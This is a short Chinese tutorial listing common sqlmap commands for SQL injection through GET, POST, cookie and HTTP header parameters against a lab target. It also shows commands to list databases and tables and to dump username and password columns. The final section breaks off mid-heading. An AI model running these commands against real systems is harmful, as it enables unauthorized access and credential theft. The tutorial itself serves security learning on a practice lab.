SQLmap常用命令/使用教程

SQLmap是一款自动化SQL注入神器,用于SQL注入信息 -f -- 获取数据库指纹 --users -- 当前使用的用户 --delay -- 设置延时 --technique -- 指定注入方式 U 联合注入 E 报错注入 B 布尔盲注 T 时间盲注

针对不同的注入位置

GET请求注入

sqlmap -u http://192.168.40.129/sqli/Less-1/?id=1

POST请求注入

sqlmap -u http://192.168.40.129/sqli/Less-11/ --data="uname=lisi"

COOKIE注入

sqlmap -u xxx/index.php --cookie "uname=admin" --level 2 --dbs

HTTP请求头注入(User-agent/Referer/Cookie等HTTP Header),拦截get,post等HTTP请求,将所有请求内容复制到target.vm文件中,在需要检测的Header后面加上*,并且需要level>=3

sqlmap -r target.vm --level 3 --dbs

获取数据

获取所有数据库

sqlmap -u http://192.168.40.129/sqli/Less-1/?id=1 --batch --dbs

获取指定数据库中的所有表

sqlmap -u http://192.168.40.129/sqli/Less-1/?id=1 --batch -D security --tables

获取指定数据库中指定表的所有字段

sqlmap -u http:xxx/?id=1 --batch -D security -T users --columns

获取指定数据库中指定表中指定字段的所有数据

sqlmap -u xxx/?id=1 --batch -D security -T users -C username,password --dump

HTTP Header头注入

1.拦截post请求SQLmap常用命令/使用教程

 

版权声明:玥玥 发表于 2021-08-10 19:07:27。
转载请注明:SQLmap常用命令/使用教程 | 女黑客导航